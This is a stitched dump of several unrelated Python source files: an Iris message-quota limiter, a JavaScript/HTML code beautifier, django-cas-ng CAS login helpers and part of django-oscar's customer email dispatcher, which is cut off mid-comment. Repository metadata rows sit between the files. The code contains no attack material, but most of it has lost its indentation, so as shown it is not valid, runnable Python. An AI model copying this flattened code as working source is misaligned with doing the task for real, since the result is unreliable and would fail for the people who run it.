def __init__(self, db, expand_targets, message_send_enqueue, sender_app):
self.db = db
self.expand_targets = expand_targets
self.message_send_enqueue = message_send_enqueue
self.iris_application = None
if sender_app:
self.iris_application = iris.cache.applications.get(sender_app)
if self.iris_application:
logger.info('Using iris application (%s) for sender quota notifications.', sender_app)
else:
                logger.error('Invalid iris application (%s) used for sender. Quota breach notifications/incidents will not work.', sender_app)
else:
logger.warning('Iris sender_app not configured so notifications for quota breaches will not work')
self.rates = {} # application: (hard_buckets, soft_buckets, hard_limit, soft_limit, wait_time, plan_name, (target_name, target_role))
self.last_incidents = {} # application: (incident_id, time())
self.last_incidents_mutex = Semaphore()
self.last_soft_quota_notification_time = {} # application: time()
self.last_soft_quota_notification_time_mutex = Semaphore()
metrics.add_new_metrics({'quota_hard_exceed_cnt': 0, 'quota_soft_exceed_cnt': 0})
spawn(self.refresh)
def get_new_rules(self):
session = self.db.Session()
for row in session.execute(get_application_quotas_query):
yield row
session.close()
def refresh(self):
while True:
logger.info('Refreshing app quotas')
new_rates = {}
for application, hard_limit, soft_limit, hard_duration, soft_duration, target_name, target_role, plan_name, wait_time in self.get_new_rules():
new_rates[application] = (hard_limit, soft_limit, hard_duration / 60, soft_duration / 60, wait_time, plan_name, (target_name, target_role))
old_keys = self.rates.viewkeys()
new_keys = new_rates.viewkeys()
# Remove old application entries
for key in old_keys - new_keys:
logger.info('Pruning old application quota for %s', key)
try:
del(self.rates[key])
del(self.last_incidents[key])
except KeyError:
pass
# Create new ones with fresh buckets
for key in new_keys - old_keys:
hard_limit, soft_limit, hard_duration, soft_duration, wait_time, plan_name, target = new_rates[key]
self.rates[key] = (deque([0] * hard_duration, maxlen=hard_duration), # hard buckets
deque([0] * soft_duration, maxlen=soft_duration), # soft buckets
hard_limit, soft_limit, wait_time, plan_name, target)
# Update existing ones + append new time interval. Keep same time bucket object if duration hasn't changed, otherwise create new
# one and resize accordingly
for key in new_keys & old_keys:
hard_limit, soft_limit, hard_duration, soft_duration, wait_time, plan_name, target = new_rates[key]
self.rates[key] = (self.rates[key][0] if len(self.rates[key][0]) == hard_duration else deque(self.rates[key][0], maxlen=hard_duration),
self.rates[key][1] if len(self.rates[key][1]) == soft_duration else deque(self.rates[key][1], maxlen=soft_duration),
hard_limit, soft_limit, wait_time, plan_name, target)
# Increase minute interval for hard + soft buckets
self.rates[key][0].append(0)
self.rates[key][1].append(0)
metrics.add_new_metrics({'app_%s_quota_%s_usage_pct' % (app, quota_type): 0 for quota_type in ('hard', 'soft') for app in new_keys})
logger.info('Refreshed app quotas: %s', ', '.join(new_keys))
sleep(60)
def allow_send(self, message):
application = message.get('application')
if not application:
return True
# Purpose of quotas is to protect downstreams. If we're already going to drop this message,
# don't let it account against quota.
if message.get('mode') == 'drop':
return True
rate = self.rates.get(application)
if not rate:
return True
hard_buckets, soft_buckets, hard_limit, soft_limit, wait_time, plan_name, target = rate
# Increment both buckets for this minute
hard_buckets[-1] += 1
soft_buckets[-1] += 1
# If hard limit breached, disallow sending this message and create incident
hard_quota_usage = sum(hard_buckets)
hard_usage_pct = 0
if hard_limit > 0:
hard_usage_pct = (hard_quota_usage / hard_limit) * 100
metrics.set('app_%s_quota_hard_usage_pct' % application, hard_usage_pct)
if hard_quota_usage > hard_limit:
metrics.incr('quota_hard_exceed_cnt')
with self.last_incidents_mutex:
self.notify_incident(application, hard_limit, len(hard_buckets), plan_name, wait_time)
return False
# If soft limit breached, just notify owner and still send
soft_quota_usage = sum(soft_buckets)
soft_usage_pct = 0
if soft_limit > 0:
soft_usage_pct = (soft_quota_usage / soft_limit) * 100
metrics.set('app_%s_quota_soft_usage_pct' % application, soft_usage_pct)
if soft_quota_usage > soft_limit:
metrics.incr('quota_soft_exceed_cnt')
with self.last_soft_quota_notification_time_mutex:
self.notify_target(application, soft_limit, len(soft_buckets), *target)
return True
return True
def notify_incident(self, application, limit, duration, plan_name, wait_time):
if not self.iris_application:
logger.warning('Application %s breached hard quota. Cannot notify owners as application is not set', application)
return
if not plan_name:
logger.error('Application %s breached hard quota. Cannot create iris incident as plan is not set (may have been deleted).', application)
return
logger.warning('Application %s breached hard quota. Will create incident using plan %s', application, plan_name)
session = self.db.Session()
# Avoid creating new incident if we have an incident that's either not claimed or claimed and wait_time hasn't been exceeded
last_incident = self.last_incidents.get(application)
if last_incident:
last_incident_id, last_incident_created = last_incident
claimed = session.execute(check_incident_claimed_query, {'id': last_incident_id}).scalar()
if claimed:
logger.info('Skipping creating incident for application %s as existing incident %s is not claimed', application, last_incident_id)
session.close()
return
if wait_time and (time() - last_incident_created) < wait_time:
logger.info('Skipping creating incident for application %s as it is not yet %s seconds since existing incident %s was claimed',
application, wait_time, last_incident_id)
session.close()
return
# Make a new incident
incident_data = {
'plan_name': plan_name,
'created': datetime.utcnow(),
'sender_app_id': self.iris_application['id'],
'context': ujson.dumps({
'quota_breach': {
'application': application,
'limit': limit,
'duration': duration
}
})
}
incident_id = session.execute(create_incident_query, incident_data).lastrowid
session.commit()
session.close()
self.last_incidents[application] = incident_id, time()
logger.info('Created incident %s', incident_id)
def notify_target(self, application, limit, duration, target_name, target_role):
if not self.iris_application:
logger.warning('Application %s breached soft quota. Cannot notify owners as application is not set', application)
return
if not target_name or not target_role:
logger.error('Application %s breached soft quota. Cannot notify owner as they aren\'t set (may have been deleted).', application)
return
last_notification_time = self.last_soft_quota_notification_time.get(application)
now = time()
if last_notification_time is not None and (now - last_notification_time) < soft_quota_notification_interval:
logger.warning('Application %s breached soft quota. Will NOT notify %s:%s as they will only get a notification once every %s seconds.',
application, target_role, target_name, soft_quota_notification_interval)
return
self.last_soft_quota_notification_time[application] = now
logger.warning('Application %s breached soft quota. Will notify %s:%s', application, target_role, target_name)
targets = self.expand_targets(target_role, target_name)
if not targets:
logger.error('Failed resolving %s:%s to notify soft quota breach.', target_role, target_name)
return
mode_id = iris.cache.modes.get('email')
if not mode_id:
logger.error('Failed resolving email mode to notify soft quota breach for application %s', application)
return
for username in targets:
message = {
'application': self.iris_application['name'],
'mode_id': mode_id,
'mode': 'email',
'target': username,
'subject': 'Application %s exceeding message quota' % application,
'body': ('Hi %s\n\nYour application %s is currently exceeding its soft quota of %s messages per %s minutes.\n\n'
'If this continues, your messages will eventually be dropped on the floor and an Iris incident will be raised.\n\n'
'Regards,\nIris') % (username, application, limit, duration, )
}
self.message_send_enqueue(message)
| bsd-2-clause | 8,125,703,374,740,582,000 | 49.024823 | 155 | 0.567945 | false | 4.372908 | false | false | false |
ghostx2013/FabricEngine_Backup | Native/ThirdParty/Private/Python/js_beautifier.py | 4 | 22785 | import sys
import os
import exceptions
import glob
fileTypes = ['.js','.kl','.html']
controls = ['case', 'default', 'do', 'else','for', 'if','while','throw', 'switch', 'catch']
keywords = ['break', 'continue', 'finally', 'return',
'try', 'var', 'with', 'delete', 'new', 'typeof', 'instanceof', '#include']
functions = ['function', 'operator']
curly = ['{', '}']
brace = ['(', ')']
bracket = ['[', ']']
allbrackets = []
allbrackets.extend(curly)
allbrackets.extend(brace)
allbrackets.extend(bracket)
quotes = ['"', "'"]
whitespace = [' ', '\n']
comment = ['//', '/*', '*/']
semicolon = [';']
comma = [',','.']
unaoperators = ['++', '--', '>>', '<<']
binoperators = ['===', '!==', '<<=', '>>=', '+=', '-=', '/=', '*=', '%=',
'||', '&&', '>=', '<=', '==', '!=', '^=', '&=', '|=',
'+', '-', '/', '*', '%', '>', '<', ':', '?', '&', '^', '=', '!']
operators = []
operators.extend(unaoperators)
operators.extend(binoperators)
splitters = []
splitters.extend(comment)
splitters.extend(comma)
splitters.extend(semicolon)
splitters.extend(allbrackets)
splitters.extend(quotes)
splitters.extend(whitespace)
splitters.extend(operators)
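# Token type flags are powers of two so composite masks (TYPE_NO_CODE,
# TYPE_OPERATOR, TYPE_ALL_BRACKETS) can be built by OR-ing individual types.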
TYPE_CONTROL = 0
TYPE_KEYWORD = 1
TYPE_FUNCTION = 2
TYPE_CURLY = 4
TYPE_BRACE = 8
TYPE_BRACKET = 16
TYPE_ALL_BRACKETS = TYPE_CURLY | TYPE_BRACE | TYPE_BRACKET
TYPE_QUOTE = 32
TYPE_WHITESPACE = 64
TYPE_COMMENT = 128
TYPE_NO_CODE = TYPE_WHITESPACE | TYPE_COMMENT
TYPE_SEMICOLON = 256
TYPE_COMMA = 512
TYPE_BINOPERATOR = 1024
TYPE_UNAOPERATOR = 2048
TYPE_OPERATOR = TYPE_BINOPERATOR | TYPE_UNAOPERATOR
TYPE_IDENTIFIER = 4096
class token():
string = ''
type = ''
index = -1
def __init__(self,string,type = TYPE_IDENTIFIER,index = 0):
self.string = string
self.type = type
self.index = index
def isTypeOf(self,type):
    # True when this token's type matches any bit of the given type mask
    return (self.type & type) != 0
def tokenize(content):
# first some basic formatting
content = content.replace('\t',' ')
# get all of the words
words = []
while len(content) > 0:
minSplitIndex = len(content)
minSplitter = ''
for i in range(len(splitters)):
split = content.partition(splitters[i])
if len(split[1]) > 0:
if len(split[0]) < minSplitIndex:
minSplitIndex = len(split[0])
minSplitter = splitters[i]
if minSplitIndex == len(content):
words.append(content)
content = ''
else:
split = content.partition(minSplitter)
if len(split[0]) > 0:
words.append(split[0])
words.append(split[1])
content = split[2]
# parse the words to tokens
tokens = []
for word in words:
tokenIdentified = False
if not tokenIdentified:
for i in range(len(controls)):
if(word == controls[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_CONTROL,i))
break
if not tokenIdentified:
for i in range(len(keywords)):
if(word == keywords[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_KEYWORD,i))
break
if not tokenIdentified:
for i in range(len(functions)):
if(word == functions[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_FUNCTION,i))
break
if not tokenIdentified:
for i in range(len(curly)):
if(word == curly[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_CURLY,i))
break
if not tokenIdentified:
for i in range(len(brace)):
if(word == brace[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_BRACE,i))
break
if not tokenIdentified:
for i in range(len(bracket)):
if(word == bracket[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_BRACKET,i))
break
if not tokenIdentified:
for i in range(len(quotes)):
if(word == quotes[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_QUOTE,i))
break
if not tokenIdentified:
for i in range(len(whitespace)):
if(word == whitespace[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_WHITESPACE,i))
break
if not tokenIdentified:
for i in range(len(comment)):
if(word == comment[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_COMMENT,i))
break
if not tokenIdentified:
for i in range(len(semicolon)):
if(word == semicolon[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_SEMICOLON,i))
break
if not tokenIdentified:
for i in range(len(comma)):
if(word == comma[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_COMMA,i))
break
if not tokenIdentified:
for i in range(len(binoperators)):
if(word == binoperators[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_BINOPERATOR,i))
break
if not tokenIdentified:
for i in range(len(unaoperators)):
if(word == unaoperators[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_UNAOPERATOR,i))
break
if not tokenIdentified:
tokenIdentified = True
tokens.append(token(word,TYPE_IDENTIFIER,0))
# now since we know the tokens, let's simply some of them
# simplify the comment tokens into single tokens
newTokens = []
lastToken = False
for i in range(len(tokens)):
if(lastToken):
if(lastToken.index == 0):
if(tokens[i].type == TYPE_WHITESPACE and tokens[i].index == 1):
newTokens.append(lastToken)
newTokens.append(tokens[i])
lastToken = False
else:
lastToken.string += tokens[i].string;
elif(lastToken.index == 1):
lastToken.string += tokens[i].string;
if(tokens[i].type == TYPE_COMMENT and tokens[i].index == 2):
newTokens.append(lastToken)
lastToken = False
elif(tokens[i].type == TYPE_COMMENT):
lastToken = tokens[i]
else:
newTokens.append(tokens[i])
if(lastToken):
newTokens.append(lastToken)
tokens = newTokens
# simplify the string tokens into single tokens
newTokens = []
lastToken = False
for i in range(len(tokens)):
if(lastToken):
if(tokens[i].type == TYPE_QUOTE):
if(tokens[i].index == lastToken.index):
lastToken.string += "'"
newTokens.append(lastToken)
lastToken = False
else:
lastToken.string += '"'
else:
lastToken.string += tokens[i].string
elif(tokens[i].type == TYPE_QUOTE):
lastToken = tokens[i]
lastToken.string = "'" # prefer singles
else:
newTokens.append(tokens[i])
if(lastToken):
newTokens.append(lastToken)
tokens = newTokens
# simplify the numeric tokens into single tokens
newTokens = []
lastToken = False
for i in range(len(tokens)-1):
if(lastToken):
if(tokens[i].type == TYPE_IDENTIFIER):
if(tokens[i].string == 'e' and lastToken.string.find('e') == -1):
lastToken.string += tokens[i].string;
else:
try:
intvalue = int(tokens[i].string[0:1])
lastToken.string += tokens[i].string;
except Exception:
newTokens.append(lastToken)
newTokens.append(tokens[i])
lastToken = False
elif(tokens[i].type == TYPE_COMMA and tokens[i].index == 1 and lastToken.string.endswith('e')):
lastToken.string += tokens[i].string;
elif(tokens[i].type == TYPE_BINOPERATOR and tokens[i].string == '-' and tokens[i+1].type == TYPE_IDENTIFIER):
try:
intvalue = int(tokens[i+1].string[0:1])
lastToken.string += tokens[i].string;
except Exception:
newTokens.append(lastToken)
newTokens.append(tokens[i])
lastToken = False
else:
newTokens.append(lastToken)
newTokens.append(tokens[i])
lastToken = False
elif(tokens[i].type == TYPE_IDENTIFIER):
try:
intvalue = int(tokens[i].string[0:1])
lastToken = tokens[i]
except Exception:
newTokens.append(tokens[i])
else:
newTokens.append(tokens[i])
if(lastToken):
newTokens.append(lastToken)
newTokens.append(tokens[len(tokens)-1])
tokens = newTokens
# simplify the regex tokens into single tokens
newTokens = []
startIndex = -1
endIndex = -1
string = ''
i = 0
while(i < len(tokens)):
if(startIndex > -1):
tkn = tokens[i];
if(not string.endswith("\\") and (
(tkn.type == TYPE_SEMICOLON) or
(tkn.type == TYPE_BRACE and tkn.index == 1) or
        (tkn.type == TYPE_WHITESPACE and tkn.index == 0)
)):
if(endIndex > -1):
string = ''
for j in range(startIndex,endIndex+1):
string += tokens[j].string
newTokens.append(token(string))
i = endIndex
else:
i = startIndex
newTokens.append(tokens[i])
startIndex = -1
endIndex = -1
string = ''
elif(tkn.type == TYPE_BINOPERATOR and tkn.string == '/'):
endIndex = i
string += tkn.string
else:
string += tkn.string
elif(i > 0 and tokens[i].type == TYPE_BINOPERATOR and tokens[i].string == '/'):
# check if the previous is not an identifier, not an operator
j = i-1
prev = tokens[j]
while(prev.type == TYPE_WHITESPACE and j > 0):
j -= 1
prev = tokens[j]
if((prev.type == TYPE_BINOPERATOR and prev.string == '=') or
(prev.type == TYPE_BRACE and prev.index == 0) or
        (prev.type == TYPE_COMMA and prev.index == 0)):
startIndex = i
string = tokens[i].string
else:
newTokens.append(tokens[i])
else:
newTokens.append(tokens[i])
i+=1
tokens = newTokens
# now let's simplify the whitespace tokens into single ones
newTokens = []
lastToken = False
for i in range(len(tokens)):
if(lastToken):
if(lastToken.index == 0):
if(tokens[i].type == TYPE_WHITESPACE):
if(tokens[i].index == 1):
lastToken = tokens[i]
else:
newTokens.append(tokens[i])
lastToken = False
elif(lastToken.index == 1):
if(tokens[i].type == TYPE_WHITESPACE):
if(tokens[i].index == 1):
if(len(lastToken.string) < 2):
lastToken.string += tokens[i].string
else:
newTokens.append(lastToken)
newTokens.append(tokens[i])
lastToken = False
elif(tokens[i].type == TYPE_WHITESPACE):
lastToken = tokens[i]
else:
newTokens.append(tokens[i])
if(lastToken):
newTokens.append(lastToken)
tokens = newTokens
# now let's switch curly and newline tokens
for i in range(len(tokens)-1):
if(tokens[i].type == TYPE_WHITESPACE):
if(tokens[i+1].type == TYPE_CURLY and tokens[i+1].index == 0):
if(i < len(tokens)-2):
if(tokens[i+2].type == TYPE_WHITESPACE):
tokens.remove(tokens[i+2])
if(i == 0 or tokens[i-1].type != TYPE_COMMENT):
tmp = tokens[i]
tokens[i] = tokens[i+1]
tokens[i+1] = tmp
elif(tokens[i].type == TYPE_CURLY and tokens[i].index == 0):
if(tokens[i+1].type != TYPE_WHITESPACE and not(tokens[i+1].type == TYPE_CURLY and tokens[i+1].index == 1)):
tokens.insert(i+1,token('\n',TYPE_WHITESPACE,1))
elif(tokens[i+1].type == TYPE_CURLY and tokens[i+1].index == 1):
      if(tokens[i].type != TYPE_WHITESPACE and not(tokens[i].type == TYPE_CURLY and tokens[i].index == 0)):
tokens.insert(i+1,token('\n',TYPE_WHITESPACE,1))
if(i == len(tokens)-2):
break
# now let's switch curly and newline tokens
curlyCount = 0
braceCount = 0
for i in range(len(tokens)-1):
if(tokens[i].type == TYPE_CURLY):
if(tokens[i].index == 0):
curlyCount += 1
else:
curlyCount -= 1
elif(tokens[i].type == TYPE_BRACE):
if(tokens[i].index == 0):
braceCount += 1
else:
braceCount -= 1
#elif(tokens[i].type == TYPE_COMMA and tokens[i].index == 0):
# if(braceCount <= curlyCount):
# tokens.insert(i+1,token('\n',TYPE_WHITESPACE,1))
return tokens
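# Convert the token stream back into formatted source text, indenting each line
# according to the current curly/brace/bracket nesting depth.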
def stringify(tokens, extension = 'js'):
lines = []
line = []
# loop over all tokens and put them in lines
for i in range(len(tokens)):
if(tokens[i].type == TYPE_WHITESPACE):
if(tokens[i].index == 1):
lines.append(line)
if(len(tokens[i].string) > 1):
lines.append([token('',TYPE_WHITESPACE)])
line = []
continue
line.append(tokens[i])
if(len(line)>0):
lines.append(line)
strings = []
tabs = ''
globalCurlyCount = 0
globalBraceCount = 0
globalBracketCount = 0
globalQuoteCount = 0
entryQuote = 0
history = []
for j in range(len(lines)):
line = lines[j]
curlyCount = 0
braceCount = 0
bracketCount = 0
string = ''
# check if we have a single control line without curly
prevLine = False
if(j > 0):
k = j-1
while(k >= 0):
if(len(lines[k]) > 0 and (len(lines[k]) > 1 or lines[k][0].type != TYPE_WHITESPACE)):
prevLine = lines[k]
break
k -= 1
for i in range(len(line)):
if(line[i].type == TYPE_CURLY):
if(line[i].index == 0):
globalCurlyCount += 1
curlyCount += 1
else:
if(curlyCount == 0):
string = string[2:100000]
globalCurlyCount -= 1
curlyCount -= 1
if(line[i].type == TYPE_BRACE):
if(line[i].index == 0):
globalBraceCount += 1
braceCount += 1
else:
if(braceCount == 0):
string = string[2:100000]
globalBraceCount -= 1
braceCount -= 1
if(line[i].type == TYPE_BRACKET):
if(line[i].index == 0):
globalBracketCount += 1
bracketCount += 1
else:
if(bracketCount == 0):
string = string[2:100000]
globalBracketCount -= 1
bracketCount -= 1
tabCount = curlyCount + braceCount + bracketCount
tabBefore = True
if(prevLine):
if(prevLine[0].type == TYPE_CONTROL and prevLine[0].string != 'case' and prevLine[0].string != 'default'):
lastToken = prevLine[len(prevLine)-1]
if(lastToken.type != TYPE_CURLY or lastToken.index > 0):
                    string += ' '
            elif(prevLine[len(prevLine)-1].type == TYPE_BINOPERATOR and tabCount <= 0):
                tabBefore = False
                string += ' '
if(tabCount < 0 and tabBefore):
for i in range(abs(tabCount)):
tabs = tabs[2:10000]
string += tabs
if(len(line)>1):
firstToken = line[0]
lastToken = line[len(line)-1]
if(firstToken.index == 1 and (firstToken.type == TYPE_CURLY or firstToken.type == TYPE_BRACE or firstToken.type == TYPE_BRACKET) and
lastToken.index == 0 and (lastToken.type == TYPE_CURLY or lastToken.type == TYPE_BRACE or lastToken.type == TYPE_BRACKET)):
string = string[2:10000]
elif(len(line) == 1 and line[0].type == TYPE_CURLY and line[0].index == 0):
string = string[2:10000]
if(tabCount < 0 and not tabBefore):
for i in range(abs(tabCount)):
tabs = tabs[2:10000]
if(tabCount > 0):
for i in range(tabCount):
tabs += ' '
for i in range(0,len(line)):
if(line[i].type == TYPE_BRACE or line[i].type == TYPE_CURLY or line[i].type == TYPE_BRACKET):
if(line[i].index == 0):
history.append(line[i].string)
else:
if(line[i].type == TYPE_CURLY):
if(len(history) > 2 and history[len(history)-1] == 'case'):
tabs = tabs[2:10000]
string = string[2:10000]
history.pop()
if(len(history) > 0):
history.pop()
if(line[i].type == TYPE_COMMENT):
string += line[i].string.strip()
continue
if(line[i].type == TYPE_CURLY):
if(line[i].index == 0 and not string.endswith(' ') and not string.endswith('[') and not string.endswith('(')):
string += ' '+line[i].string
continue
if(line[i].type == TYPE_FUNCTION):
if(line[i+1].type != TYPE_BRACE and (line[i].string == 'function' or extension == 'kl')):
string += line[i].string+' '
continue
if(line[i].type == TYPE_BINOPERATOR):
if(line[i].string == '-'):
if(i==0):
string += line[i].string
continue
if(line[i-1].type != TYPE_IDENTIFIER and line[i-1].index == 0):
string += line[i].string
continue
if(not string.endswith(' ')):
if line[i].string == ":" :
if(len(history) > 0):
if(history[len(history)-1] == '?'):
string += ' '
history.pop()
elif line[i].string == "?":
history.append('?')
string += ' '
elif line[i].string == "!":
if(not string.endswith('(')):
string += ' '
else:
string += ' '
string += line[i].string
if(i < len(line)-1 and line[i].string != '!'):
string += ' '
continue
if(line[i].type == TYPE_COMMA and line[i].index == 0 and i < len(line)-1):
string += line[i].string+' '
continue
if(line[i].type == TYPE_CONTROL):
if(line[i].string == 'case' or line[i].string == 'default'):
if(len(history)>0 and history[len(history)-1] == 'case'):
string = string[2:10000]
else:
history.append('case')
tabs += ' '
if(i < len(line)-1 and (line[i+1].type == TYPE_BRACE or line[i+1].type == TYPE_CONTROL or line[i+1].type == TYPE_COMMENT or line[i+1].type == TYPE_IDENTIFIER)):
string += line[i].string+' '
else:
string += line[i].string
continue
if(line[i].type == TYPE_KEYWORD and (line[i].string == "var" or line[i].string == "#include")):
string += line[i].string+' '
continue
if(line[i].type == TYPE_KEYWORD and line[i].string == "return" and i < len(line)-1 and line[i+1].type != TYPE_SEMICOLON):
string += line[i].string+' '
continue
if(line[i].type == TYPE_IDENTIFIER and len(string) > 0 and not string.endswith(' ') and not string.endswith('.') and not string.endswith('(') and not string.endswith('[') and not string.endswith('{') and not string.endswith('!')):
if(string.endswith('-') and not string[0:len(string)-1].endswith(' ')):
string += line[i].string
else:
string += ' '+line[i].string
continue
if(line[i].type == TYPE_SEMICOLON and i < len(line)-1 and line[i+1].type != TYPE_WHITESPACE):
string += line[i].string + ' '
continue
string += line[i].string
if(len(string.strip())==0):
strings.append('')
else:
strings.append(string)
# now reindent the tabs, based on smallest indent possible
counts = []
for string in strings:
count = 0
while(string[count*2:count*2+1] == ' '):
count += 1
counts.append(count)
def reindent(strings,counts,index):
if(strings[index] == ''):
return
count = counts[index]
while(counts[index+1] == count or strings[index+1] == ''):
index += 1
if(index == len(counts)-1):
return
if(counts[index+1] > count+1):
highIndex = index+1
lowIndex = index+1
# we found a 2 tabbing or higher
# now let's check if the next lower one is also my count
while(counts[lowIndex] >= counts[highIndex] or strings[lowIndex] == ''):
lowIndex += 1
if(lowIndex == len(counts)-1):
break
if(counts[lowIndex] <= count):
# fantastic, we can lower the tabs
diff = count - counts[highIndex] + 1
for i in range(highIndex,lowIndex):
counts[i] += diff
for i in range(len(counts)-1):
reindent(strings,counts,i)
for i in range(len(counts)):
count = 0
while(strings[i][count:count+1] == ' '):
count += 1
newCount = counts[i] * 2
strings[i] = strings[i][(count-newCount):100000]
return '\n'.join(strings)
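# Illustrative helper (not part of the original tool): the same two passes can
# be run on an in-memory string instead of a file on disk. tokenize() is
# assumed to be the tokenizer defined earlier in this module.
def beautifyString(source, extension='js'):
    # Tokenize the raw source, then rebuild it with normalised whitespace,
    # indentation and braces.
    return stringify(tokenize(source), extension)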
def parseJSFile(fileName):
# get the content
content = open(fileName).read()
tokens = tokenize(content)
string = stringify(tokens)
if(not string.endswith('\n')):
string += '\n'
open(fileName,'w').write(string)
def parseHTMLFile(fileName):
# get the content
lines = open(fileName).read().replace('\t',' ').replace('\r\n','\n').replace('\r','\n').split('\n')
prejscontent = []
jscontent = []
postjscontent = []
insideJS = 0
for line in lines:
stripped = line.lower().strip()
if(insideJS == 0):
if(stripped.startswith('<')):
stripped = stripped[1:10000].strip()
if(stripped.startswith('script') and stripped.find('src')==-1):
insideJS = 1
prejscontent.append(line)
elif(insideJS == 1):
if(stripped.startswith('<')):
insideJS = 2
postjscontent.append(line)
else:
jscontent.append(line)
else:
postjscontent.append(line)
tokens = tokenize('\n'.join(jscontent))
string = stringify(tokens)
string = '\n'.join(prejscontent) + '\n' + string + '\n' + '\n'.join(postjscontent)
open(fileName,'w').write(string)
def main():
if(not sys.argv or len(sys.argv) == 0):
raise(Exception("No files specified!"))
arguments = []
for arg in sys.argv:
arguments.append(arg)
if(len(arguments) <= 1):
print("Run the tool with all paths to beautify!")
return
files = []
for arg in arguments:
if(arg.find('*') != -1):
matched = glob.glob(arg)
for match in matched:
arguments.append(match)
continue
for ft in fileTypes:
if(arg.lower().endswith(ft)):
if(os.path.exists(arg)):
files.append(arg)
break
else:
raise(Exception("The file '"+arg+' does not exist!'))
# parse each file
for i in range(len(files)):
extension = files[i].lower().rpartition('.')[2]
if(extension == 'js' or extension == 'kl'):
parseJSFile(files[i])
elif(extension == 'html' or extension == 'htm'):
parseHTMLFile(files[i])
else:
raise(Exception("Unsupported file format '"+extension+"'!"))
print(str(i+1)+" of "+str(len(files))+" : beautified '"+files[i]+"' successfully.")
if __name__ == '__main__':
main() | agpl-3.0 | 8,105,533,336,471,990,000 | 30.691238 | 236 | 0.560588 | false | 3.587624 | false | false | false |
IRI-Research/django-cas-ng | django_cas_ng/utils.py | 2 | 1949 | from .cas import CASClient
from django.conf import settings as django_settings
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.utils.six.moves import urllib_parse
def get_protocol(request):
"""Returns 'http' or 'https' for the request protocol"""
if request.is_secure():
return 'https'
return 'http'
def get_redirect_url(request):
"""Redirects to referring page, or CAS_REDIRECT_URL if no referrer is
set.
"""
next_ = request.GET.get(REDIRECT_FIELD_NAME)
if not next_:
if django_settings.CAS_IGNORE_REFERER:
next_ = django_settings.CAS_REDIRECT_URL
else:
next_ = request.META.get('HTTP_REFERER', django_settings.CAS_REDIRECT_URL)
prefix = urllib_parse.urlunparse(
(get_protocol(request), request.get_host(), '', '', '', ''),
)
if next_.startswith(prefix):
next_ = next_[len(prefix):]
return next_
def get_service_url(request, redirect_to=None):
"""Generates application django service URL for CAS"""
protocol = get_protocol(request)
host = request.get_host()
service = urllib_parse.urlunparse(
(protocol, host, request.path, '', '', ''),
)
if '?' in service:
service += '&'
else:
service += '?'
service += urllib_parse.urlencode({
REDIRECT_FIELD_NAME: redirect_to or get_redirect_url(request)
})
return service
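# Illustrative sketch (not part of the original module): how the helpers above
# are typically combined in a login view. ``request`` is a Django HttpRequest;
# get_login_url() is assumed to be provided by the bundled CASClient, and the
# caller is assumed to redirect to the returned URL.
def _example_cas_login_url(request):
    # Build the callback ("service") URL for this request, then ask the CAS
    # client for the matching login URL on the configured CAS server.
    service_url = get_service_url(request)
    client = get_cas_client(service_url=service_url)
    return client.get_login_url()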
def get_cas_client(service_url=None):
"""
    Initializes the CASClient according to
    the CAS_* settings.
"""
return CASClient(
service_url=service_url,
version=django_settings.CAS_VERSION,
server_url=django_settings.CAS_SERVER_URL,
extra_login_params=django_settings.CAS_EXTRA_LOGIN_PARAMS,
renew=django_settings.CAS_RENEW,
username_attribute=django_settings.CAS_USERNAME_ATTRIBUTE,
proxy_callback=django_settings.CAS_PROXY_CALLBACK
)
| mit | -8,768,147,920,393,516,000 | 29.936508 | 86 | 0.638789 | false | 3.821569 | false | false | false |
WillisXChen/django-oscar | src/oscar/apps/customer/utils.py | 18 | 4652 | import logging
from django.conf import settings
from django.contrib.auth.tokens import default_token_generator
from django.core.mail import EmailMessage, EmailMultiAlternatives
from django.core.urlresolvers import reverse
from django.utils.encoding import force_bytes
from django.utils.http import urlsafe_base64_encode
from oscar.core.loading import get_model
CommunicationEvent = get_model('order', 'CommunicationEvent')
Email = get_model('customer', 'Email')
class Dispatcher(object):
def __init__(self, logger=None):
if not logger:
logger = logging.getLogger(__name__)
self.logger = logger
# Public API methods
def dispatch_direct_messages(self, recipient, messages):
"""
Dispatch one-off messages to explicitly specified recipient(s).
"""
if messages['subject'] and messages['body']:
self.send_email_messages(recipient, messages)
def dispatch_order_messages(self, order, messages, event_type=None,
**kwargs):
"""
Dispatch order-related messages to the customer
"""
if order.is_anonymous:
if 'email_address' in kwargs:
self.send_email_messages(kwargs['email_address'], messages)
elif order.guest_email:
self.send_email_messages(order.guest_email, messages)
else:
return
else:
self.dispatch_user_messages(order.user, messages)
# Create order communications event for audit
if event_type is not None:
CommunicationEvent._default_manager.create(
order=order, event_type=event_type)
def dispatch_user_messages(self, user, messages):
"""
Send messages to a site user
"""
if messages['subject'] and (messages['body'] or messages['html']):
self.send_user_email_messages(user, messages)
if messages['sms']:
self.send_text_message(user, messages['sms'])
# Internal
def send_user_email_messages(self, user, messages):
"""
Sends message to the registered user / customer and collects data in
database
"""
if not user.email:
self.logger.warning("Unable to send email messages as user #%d has"
" no email address", user.id)
return
email = self.send_email_messages(user.email, messages)
        # If the user is signed in, record the event for audit
if email and user.is_authenticated():
Email._default_manager.create(user=user,
subject=email.subject,
body_text=email.body,
body_html=messages['html'])
def send_email_messages(self, recipient, messages):
"""
Plain email sending to the specified recipient
"""
if hasattr(settings, 'OSCAR_FROM_EMAIL'):
from_email = settings.OSCAR_FROM_EMAIL
else:
from_email = None
# Determine whether we are sending a HTML version too
if messages['html']:
email = EmailMultiAlternatives(messages['subject'],
messages['body'],
from_email=from_email,
to=[recipient])
email.attach_alternative(messages['html'], "text/html")
else:
email = EmailMessage(messages['subject'],
messages['body'],
from_email=from_email,
to=[recipient])
self.logger.info("Sending email to %s" % recipient)
email.send()
return email
def send_text_message(self, user, event_type):
raise NotImplementedError
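# Illustrative sketch (not part of the original module): sending a one-off
# notification through the dispatcher above. The subject/body values are
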